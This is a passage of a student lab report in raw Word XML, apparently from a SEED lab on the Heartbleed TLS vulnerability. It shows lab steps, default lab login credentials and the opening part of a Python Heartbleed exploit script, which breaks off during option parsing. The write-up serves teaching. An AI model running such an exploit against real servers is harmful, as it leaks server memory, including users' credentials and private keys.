    </w:p>
    <w:p w14:paraId="60664C6A" w14:textId="77777777" w:rsidR="003E31D1" w:rsidRPr="003E31D1" w:rsidRDefault="003E31D1" w:rsidP="003E31D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Login as the site administrator. (User </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Name:admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E31D1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3E31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Password:seedelgg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD886CB" w14:textId="77777777" w:rsidR="003E31D1" w:rsidRDefault="003E31D1" w:rsidP="003E31D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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3E31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Boby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as friend. (Go to More -&gt; Members and click </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Boby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; Add Friend)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2725A7" w14:textId="034DCDB0" w:rsidR="004A2CF9" w:rsidRPr="003E31D1" w:rsidRDefault="003E31D1" w:rsidP="003E31D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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3E31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Send </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Boby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a private message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0837B0BF" w14:textId="184E0914" w:rsidR="00F46F81" w:rsidRDefault="00F46F81" w:rsidP="00824658">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04BF1485" w14:textId="3182D409" w:rsidR="008F6B2E" w:rsidRDefault="008F6B2E" w:rsidP="00824658">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="030D2D12" w14:textId="2B86D02D" w:rsidR="008F6B2E" w:rsidRDefault="008F6B2E" w:rsidP="00824658">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DED1082" w14:textId="3A9F4AFB" w:rsidR="008F6B2E" w:rsidRDefault="008F6B2E" w:rsidP="00824658">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C0C4D7D" w14:textId="4F0560C4" w:rsidR="008F6B2E" w:rsidRDefault="008F6B2E" w:rsidP="00824658">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C5E2D6D" w14:textId="36DA062B" w:rsidR="008F6B2E" w:rsidRPr="002B5F14" w:rsidRDefault="008F6B2E" w:rsidP="0082465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Login as admin , then add </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bob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s a friend and send a message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C736D43" w14:textId="05EAD2DF" w:rsidR="00A06BD3" w:rsidRDefault="008F6B2E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13562F4A" wp14:editId="6FA0C678">
            <wp:extent cx="5943600" cy="2282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706F" w14:textId="04EE0761" w:rsidR="008F6B2E" w:rsidRDefault="008F6B2E"/>
    <w:p w14:paraId="3A9DB86E" w14:textId="442F8345" w:rsidR="008F6B2E" w:rsidRDefault="008F6B2E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05B3900D" wp14:editId="54A9FCA4">
            <wp:extent cx="4400550" cy="3228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D5B1" w14:textId="3FD1C928" w:rsidR="008179F3" w:rsidRDefault="008179F3"/>
    <w:p w14:paraId="6E1EE60F" w14:textId="326CC82F" w:rsidR="008179F3" w:rsidRDefault="008179F3"/>
    <w:p w14:paraId="12487AEF" w14:textId="01A0DDB9" w:rsidR="008179F3" w:rsidRDefault="008179F3"/>
    <w:p w14:paraId="1366ACD8" w14:textId="65019B81" w:rsidR="008179F3" w:rsidRDefault="008179F3"/>
    <w:p w14:paraId="09B7A2AF" w14:textId="64E8C447" w:rsidR="008179F3" w:rsidRDefault="008179F3"/>
    <w:p w14:paraId="50BEB42E" w14:textId="3F132120" w:rsidR="008179F3" w:rsidRDefault="008179F3"/>
    <w:p w14:paraId="5BEAAF5A" w14:textId="3B1A7077" w:rsidR="008179F3" w:rsidRDefault="008179F3"/>
    <w:p w14:paraId="00594692" w14:textId="6570E96F" w:rsidR="009F02D9" w:rsidRDefault="009F02D9" w:rsidP="009F02D9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc48461942"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Heartbleed Attack – Result:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="37B84342" w14:textId="77777777" w:rsidR="009F02D9" w:rsidRPr="009F02D9" w:rsidRDefault="009F02D9" w:rsidP="009F02D9"/>
    <w:p w14:paraId="5C181C80" w14:textId="692AA317" w:rsidR="008179F3" w:rsidRDefault="009F02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F9B06" wp14:editId="3A9B2C0E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4312920</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>609600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1546860" cy="7620"/>
                <wp:effectExtent l="0" t="0" r="3429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8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114F5" id="Straight Connector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6pt,48pt" to="461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314405F" wp14:editId="202A17AC">
            <wp:extent cx="5943600" cy="831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AB97" w14:textId="451D3473" w:rsidR="008179F3" w:rsidRPr="008179F3" w:rsidRDefault="008179F3" w:rsidP="008179F3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Contents of the Message, Subject and Message sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DAAC63" w14:textId="155ECD1B" w:rsidR="008179F3" w:rsidRDefault="009F02D9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B09D7" wp14:editId="38F21B9F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4198620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2788920</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1546860" cy="7620"/>
                <wp:effectExtent l="0" t="0" r="3429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8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3F91F" id="Straight Connector 1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pt,219.6pt" to="452.4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" strokecolor="red" strokeweight=".5pt">
                <v:stroke joinstyle="miter"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008179F3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F1A1525" wp14:editId="1F3A727E">
            <wp:extent cx="5943600" cy="2885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3DAD" w14:textId="251E10E2" w:rsidR="009F02D9" w:rsidRDefault="009F02D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D7A6B79" w14:textId="2C79AB5E" w:rsidR="009F02D9" w:rsidRDefault="009F02D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52B007A5" w14:textId="46221E42" w:rsidR="009F02D9" w:rsidRDefault="009F02D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25EF913C" w14:textId="72A37AAB" w:rsidR="009F02D9" w:rsidRDefault="009F02D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04A5E417" w14:textId="6B2C0478" w:rsidR="009F02D9" w:rsidRDefault="009F02D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B45FB1" w14:textId="2CC7B296" w:rsidR="009F02D9" w:rsidRDefault="009F02D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="041B018F" w14:textId="1B176EFE" w:rsidR="009F02D9" w:rsidRDefault="009F02D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D09C7E8" w14:textId="2B4713FB" w:rsidR="009F02D9" w:rsidRDefault="009F02D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D65208" w14:textId="1915F28C" w:rsidR="009F02D9" w:rsidRDefault="009F02D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A069F13" w14:textId="6B11A146" w:rsidR="009F02D9" w:rsidRDefault="009F02D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E64E08F" w14:textId="1F07979B" w:rsidR="009F02D9" w:rsidRDefault="009F02D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="014FDDFE" w14:textId="70041417" w:rsidR="009F02D9" w:rsidRDefault="009F02D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6783A6BF" w14:textId="4748A49A" w:rsidR="009F02D9" w:rsidRDefault="009F02D9" w:rsidP="009F02D9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc48461943"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Malicious Heartbeat packets</w:t>
      </w:r>
      <w:r w:rsidR="000E7537">
        <w:t xml:space="preserve"> – Source Code</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="3FE4E051" w14:textId="4A7E486F" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="009F02D9"/>
    <w:p w14:paraId="308FE3E9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>#!/usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B27296E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="486D14E3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1BC71D96" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t># Code originally from https://gist.github.com/eelsivart/10174134</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C6C428" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve"># Modified by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Haichao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Zhang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24600302" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t># Last Updated: 2/12/15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12601A5A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t># Version 1.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDFB222" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1FC1881D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8F7821" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="410081A6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7A9A37" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="397B12D0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t># -added option to the payload length of the heartbeat payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418D7F71" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6C5EEFA2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t># Don't forget to "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 775 ./attack.py" to make the code executable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111C1509" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7D5FC56B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve"># Students can use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eg.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "./attack.py www.seedlabelgg.com -l 0x4001" to send the heartbeat request with payload length variable=0x4001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E25A131" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="64A5B070" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t># The author disclaims copyright to this source code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436E9825" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="04CFAD05" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2E2D49AC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1A700F72" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580D5896" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="130C59F9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>import struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE45303" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="615184B6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5D262B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="038DF041" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77469CAA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6AF528A8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>import select</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A259B75" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6FC9BD07" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2965BA78" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3EAF4A10" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B911B1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="07E890E4" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000B294A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="473BA0AC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>optparse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OptionParser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="558FC771" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="07E3232E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2FC9491E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5806E095" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">options = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OptionParser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(usage='%prog server [options]', description='Test and exploit TLS heartbeat vulnerability aka </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>heartbleed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (CVE-2014-0160)')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE2A86C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0463E71E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>options.add_option</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A62000" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0B265906" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>options.add_option</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('-l', '--length', type='int', default=0x4000,dest="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", help='payload length to test (default: 0x4000)')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5931F76C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6CEDC592" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>options.add_option</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('-n', '--num', type='int', default=1, help='Number of times to connect/loop (default: 1)')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C15BFC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2CF2CCC2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>options.add_option</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('-s', '--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>starttls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', action="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>store_true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>starttls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", help='Issue STARTTLS command for SMTP/POP/IMAP/FTP/etc...')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A5EBD7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6D558E3D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>options.add_option</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('-f', '--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>filein</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">', type='str', help='Specify input file, line delimited, IPs or hostnames or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>IP:port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostname:port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063EB32C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2E6C5FF3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>options.add_option</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('-v', '--verbose', action="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>store_true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
